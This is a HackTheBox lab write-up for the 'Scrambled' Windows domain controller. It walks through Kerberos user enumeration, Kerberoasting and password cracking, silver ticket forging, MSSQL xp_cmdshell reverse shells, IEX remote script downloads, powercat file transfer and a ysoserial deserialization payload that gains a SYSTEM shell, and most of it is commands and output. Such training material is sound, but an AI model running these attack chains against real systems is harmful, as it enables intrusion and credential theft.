Scrambled- [HTB]

Cover Image for Scrambled- [HTB]

Table of Contents


    Scrambled is a medium Windows HackTheBox machine where the attacker will have to enumerate usernames on a DC to get an account with default credentials. This account can be used to retrieve a TGT from a SPNService, giving the attacker access to an MSSQL database with credentials on it. Furthermore, it will have to execute commands on the database to obtain a reverse shell.

    Finally, the attacker will have to find an object deserialization on a .NET application, that can lead it to get a reverse shell as administrator on the machine.


    As always, let's start finding all opened ports in the machine with Nmap.

    kali@kali:~/Documents/HTB/Scrambled$ sudo nmap -v -sS -p- -n -T4 -oN AllPorts.txt
    Nmap scan report for
    Host is up (0.11s latency).
    Not shown: 65513 filtered tcp ports (no-response)
    53/tcp    open  domain
    80/tcp    open  http
    88/tcp    open  kerberos-sec
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    389/tcp   open  ldap
    445/tcp   open  microsoft-ds
    464/tcp   open  kpasswd5
    593/tcp   open  http-rpc-epmap
    636/tcp   open  ldapssl
    1433/tcp  open  ms-sql-s
    3268/tcp  open  globalcatLDAP
    3269/tcp  open  globalcatLDAPssl
    4411/tcp  open  found
    5985/tcp  open  wsman
    9389/tcp  open  adws
    49667/tcp open  unknown
    49673/tcp open  unknown
    49674/tcp open  unknown
    49700/tcp open  unknown
    49704/tcp open  unknown
    50357/tcp open  unknown
    Read data files from: /usr/bin/../share/nmap
    # Nmap done at Thu Jun 30 15:36:06 2022 -- 1 IP address (1 host up) scanned in 166.62 seconds

    Then, we continue with a deeper scan of every opened port, getting more information about each service.

    kali@kali:~/Documents/HTB/Scrambled$ sudo nmap -sC -sV -n -T4 -oN PortsDepth.txt -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,4411,5985,9389,49667,49673,49674,49700,49704,50357
    Nmap scan report for
    Host is up (0.11s latency).
    53/tcp    open  domain        Simple DNS Plus
    80/tcp    open  http          Microsoft IIS httpd 10.0
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-title: Scramble Corp Intranet
    |_http-server-header: Microsoft-IIS/10.0
    88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-30 19:36:27Z)
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
    |_ssl-date: 2022-06-30T19:39:35+00:00; -1s from scanner time.
    | ssl-cert: Subject: commonName=DC1.scrm.local
    | Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
    | Not valid before: 2022-06-09T15:30:57
    |_Not valid after:  2023-06-09T15:30:57
    445/tcp   open  microsoft-ds?
    464/tcp   open  kpasswd5?
    593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    4411/tcp  open  found?
    | fingerprint-strings: 
    |   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
    |   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
    Host script results:
    | smb2-time: 
    |   date: 2022-06-30T19:38:58
    |_  start_date: N/A
    Service detection performed. Please report any incorrect results at .
    # Nmap done at Thu Jun 30 15:39:38 2022 -- 1 IP address (1 host up) scanned in 197.35 seconds

    Inspecting port 80, there is a web page talking about an intranet site.


    Then, at the "IT Services" tab, there is the following text. Giving us a hint that the machine is not NTLM hash stuff, so it could be related with Kerberoes.

    Support Alert

    Furthermore, on the same page, there is a text talking about a password reset system which requires a username.

    Password resets

    In order to find a username, we can use kerbrute and a good username wordlist.

    kali@kali:~/Documents/HTB/Scrambled$ kerbrute userenum --dc -d scrm.local /usr/share/wordlists/kerberos_enum_userlists/A-ZSurnames.txt 
        __             __               __     
       / /_____  _____/ /_  _______  __/ /____ 
      / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
    /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
    Version: v1.0.3 (9dad6e1) - 06/30/22 - Ronnie Flathers @ropnop
    2022/06/30 16:29:22 >  Using KDC(s):
    2022/06/30 16:29:22 >
    2022/06/30 16:29:22 >  [+] VALID USERNAME:       ASMITH@scrm.local
    2022/06/30 16:30:16 >  [+] VALID USERNAME:       JHALL@scrm.local
    2022/06/30 16:30:22 >  [+] VALID USERNAME:       KSIMPSON@scrm.local
    2022/06/30 16:30:25 >  [+] VALID USERNAME:       KHICKS@scrm.local
    2022/06/30 16:31:07 >  [+] VALID USERNAME:       SJENKINS@scrm.local

    Then, trying each username as a password, we can find that the user "KSIMPSON" its username it's also its password.

    kali@kali:~/Documents/HTB/Scrambled$ kerbrute bruteuser --dc -d scrm.local users.txt KSIMPSON
        __             __               __     
       / /_____  _____/ /_  _______  __/ /____ 
      / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
    /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
    Version: v1.0.3 (9dad6e1) - 06/30/22 - Ronnie Flathers @ropnop
    2022/06/30 16:49:10 >  Using KDC(s):
    2022/06/30 16:49:10 >
    2022/06/30 16:49:10 >  [+] VALID LOGIN:  KSIMPSON@scrm.local:ksimpson
    2022/06/30 16:49:10 >  Done! Tested 10 logins (1 successes) in 0.444 seconds

    Because NTLM Authentication has been disabled, let's try to obtain a TGT.

    kali@kali:~/Documents/HTB/Scrambled$ scrm.local/KSIMPSON:ksimpson -dc-ip
    Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
    [*] Saving ticket in KSIMPSON.ccache

    Using the ticket, we can obtain the Service Principal Name of the account, which is an MSSQL service.

    Note: The GetUserSPNs has an unfixed issue when using Kerberos credentials from a ccache file. So, to fix this error you need to edit the file changing target = self.__kdcHost by target = self.getMachineName(). Moreover, you need to use the domain in the -dc-ip parameter to make it work.

    kali@kali:~/Documents/HTB/Scrambled$ KRB5CCNAME=ksimpson.ccachec -dc-ip dc1.scrm.local scrm.local/ksimpson -request -k -no-pass
    Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
    ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation 
    ----------------------------  ------  --------  --------------------------  --------------------------  ----------
    MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2022-06-30 01:27:08.621499             
    MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 12:32:02.351452  2022-06-30 01:27:08.621499             

    Then, using john, we can crack the password, which will get us handy in the future.

    kali@kali:~/Documents/HTB/Scrambled$ john -w=/usr/share/wordlists/rockyou.txt  ksimpson_hash.txt 
    Using default input encoding: UTF-8
    Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
    Will run 4 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    Pegasus60        (?)     
    1g 0:00:00:04 DONE (2022-07-03 11:35) 0.2277g/s 2444Kp/s 2444Kc/s 2444KC/s Penrose..Pearce
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed. 

    Furthermore, we can gain access to the shares available in the domain.

    kali@kali:~/Documents/HTB/Scrambled$ KRB5CCNAME=ksimpson.ccache -k -no-pass dc1.scrm.local
    Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
    Type help for list of commands
    # shares

    The only share that we have access to is the "Public" share, where we can obtain a pdf file.

    # use Public
    # ls
    drw-rw-rw-          0  Thu Nov  4 18:23:19 2021 .
    drw-rw-rw-          0  Thu Nov  4 18:23:19 2021 ..
    -rw-rw-rw-     630106  Fri Nov  5 13:45:07 2021 Network Security Changes.pdf
    # get Network Security Changes.pdf

    The PDF exposes the following:

    Additional security measures

    Exploitation 1

    As it says in the document, the attacker was able to access the SQL service using the NTLM relay. So, they have disabled the use of NTLM, allowing only Administrators using tickets to access the SQL service.

    Because we were able to obtain the password for the SQL service earlier, we can create a Silver Ticket as the user Administrator. However, we need to obtain the SID of MSSQLSVC.

    For doing so, there are two alternatives:

    # Alternative 1
    KRB5CCNAME=Ksimpson.ccache -k scrm.local/ksimpson@dc1.scrm.local -no-pass -debug 2>/dev/null | grep DRSCrackNames
    [+] Calling DRSCrackNames for S-1-5-21-2743207045-1827831105-2542523200-500
    # Alternative 2 -targetUser sqlsvc scrm.local/sqlsvc:Pegasus60 | grep "Domain SID"
    Domain SID: S-1-5-21-2743207045-1827831105-2542523200

    Then, we need to convert the cracked password into NTLM format.

    Finally, we can create the Silver Ticket with the following command.

    kali@kali:~/Documents/HTB/Scrambled$ -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/dc1.scrm.local Administrator
    Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
    [*] Creating basic skeleton ticket and PAC Infos
    [*] Customizing ticket for scrm.local/Administrator
    [*]     PAC_LOGON_INFO
    [*]     EncTicketPart
    [*]     EncTGSRepPart
    [*] Signing/Encrypting final ticket
    [*]     EncTicketPart
    [*]     EncTGSRepPart
    [*] Saving ticket in Administrator.ccache

    Now, we should be able to access the database.

    kali@kali:~/Documents/HTB/Scrambled$ KRB5CCNAME=Administrator.ccache -k -no-pass  dc1.scrm.localImpacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
    [*] Encryption required, switching to TLS
    [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
    [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
    [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
    [*] INFO(DC1): Line 1: Changed database context to 'master'.
    [*] INFO(DC1): Line 1: Changed language setting to us_english.
    [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
    [!] Press help for extra shell commands

    Enumerating the database, we find other user credentials.

    # Databases
    SQL> SELECT name FROM master.sys.databases
    # Tables created by a user
    # Dump tables
    SQL> select * from UserImport;
    LdapUser      LdapPwd      LdapDomain RefreshInterval IncludeGroups   
    -------- ----------------- ---------- --------------- -------------
    MiscSvc  ScrambledEggs9900 scrm.local        90           0   

    Exploitation 2

    In addition, if we enable the de xp_cmdshell module, we can execute commands on the machine.

    SQL> enable_xp_cmdshell;
    [*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
    [*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
    SQL> xp_cmdshell whoami

    In order to get a reverse shell, you can use the "PowerShell #3 (Base64)" from

    SQL> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAG[...]
    kali@kali:~/Documents/HTB/Scrambled$ nc -nlvp 443
    listening on [any] 443 ...
    connect to [] from (UNKNOWN) [] 57867
    PS C:\Windows\system32>

    Now, we need to create another reverse shell in order to become MiscSvc, obtaining the user flag.

    For doing so, execute the following commands:

    $SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
    $Cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $SecPassword)
    Invoke-Command -Computer dc1 -Credential $Cred -ScriptBlock {<SAME PAYLOAD AS BEFORE>}

    Privilege Escalation

    Looking in the Shares folder appears the following application.

    PS C:\Shares> dir "IT\Apps\Sales Order Client"
        Directory: C:\Shares\IT\Apps\Sales Order Client
    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -a----       05/11/2021     20:52          86528 ScrambleClient.exe
    -a----       05/11/2021     20:52          19456 ScrambleLib.dll

    For doing so, we can use Powercat to download the files. Then, to check if the files were downloaded successfully we can use sha256sum.

    PS C:\Shares\IT\Apps\Sales Order Client> IEX (New-Object System.Net.Webclient).DownloadString('')
    PS C:\Shares\IT\Apps\Sales Order Client> powercat -c -p 4444 -t 2 -i "C:\Shares\IT\Apps\Sales Order Client\ScrambleClient.exe"
    PS C:\Shares\IT\Apps\Sales Order Client> Get-FileHash "C:\Shares\IT\Apps\Sales Order Client\ScrambleClient.exe"
    Algorithm       Hash                                                                   Path        
    ---------       --------        
    SHA256          3C4892B87D034DB901A05A6C0664048BA4B8867183D172E424E900E3311FB8EC       C:\Shares...
    kali@kali:~/Documents/HTB/Scrambled$ nc -w 2 -nlvp 4444 > ScrambleClient.exe
    kali@kali:~/Documents/HTB/Scrambled$ sha256sum ScrambleClient.exe
    3c4892b87d034db901a05a6c0664048ba4b8867183d172e424e900e3311fb8ec  ScrambleClient.exe
    powercat -c -p 4444 -i "C:\Shares\IT\Apps\Sales Order Client\ScrambleLib.dll"
    kali@kali:~/Documents/HTB/Scrambled$ nc -nlvp 4444 > ScrambleLib.dll
    kali@kali:~/Documents/HTB/Scrambled$ sha256sum ScrambleLib.dll
    0bd04dc21000b5dbd7d4adc10e56494b992537843db2c18510d54c6e40085652  ScrambleLib.dll

    Using dnSpy to decompile the DLL we can find the codes used by the application at port 4411.

    # ScrambleLib/SracmbleNetSharesd
    public const string CODE_ERROR_GENERIC = "ERROR_GENERAL";
    public const string CODE_SUCCESS = "SUCCESS";
    public const string CODE_BANNER = "SCRAMBLECORP_ORDERS_V1.0.3";
    public const string CODE_TIMEOUT = "SESSION_TIMED_OUT";
    public const string CODE_LIST_ORDERS = "LIST_ORDERS";
    public const string CODE_UPLOAD_ORDER = "UPLOAD_ORDER";
    public const string CODE_LOGON = "LOGON";
    public const string CODE_QUIT = "QUIT";
    public const int ServerPort = 4411;
    public const char MessagePartSeparator = ';';
    public const char ContentListSeparator = '|';

    As we can see there are two special commands LIST_ORDERS and UPLOAD_ORDER.

    kali@kali:~/Documents/HTB/Scrambled$ nc scrm.local 4411

    Decoding the base64 seems to be an object (Do it by yourself because there is a lot of junk data). This can be confirmed based on the following tests.

    ERROR_GENERAL;Error deserializing sales order: Attempting to deserialize an empty stream.
    ERROR_GENERAL;Error deserializing sales order: Invalid length for a Base-64 char array or string.

    After some trial and error, we could use the payload to ping our host.

    ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "ping"
    kali@kali:~/Documents/HTB/Scrambled$ echo "UPLOAD_ORDER;<ysoserial payload>" | nc scrm.local 4411
    kali@kali:~/Documents/HTB/Scrambled$ sudo tcpdump -i tun0 icmp
    15:17:43.467722 IP scrm.local > ICMP echo request, id 1, seq 12, length 40
    15:17:43.467754 IP > scrm.local: ICMP echo reply, id 1, seq 12, length 40

    Finally, in order to obtain a reverse shell, we can use the same payload from revshell and execute the same command.

    ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "<PowerShell #3 (Base64) PAYLOAD>"
    kali@kali:~/Documents/HTB/Scrambled$ echo "UPLOAD_ORDER;<ysoserial payload>" | nc scrm.local 4411
    kali@kali:~/Documents/HTB/Scrambled$ rlwrap nc -nlvp 4445
    listening on [any] 4445 ...
    connect to [] from (UNKNOWN) [] 59307
    PS C:\Users\Administrator\Desktop> whoami
    nt authority\system
    PS C:\Users\Administrator\Desktop> type C:\Users\Administrator\Desktop\root.txt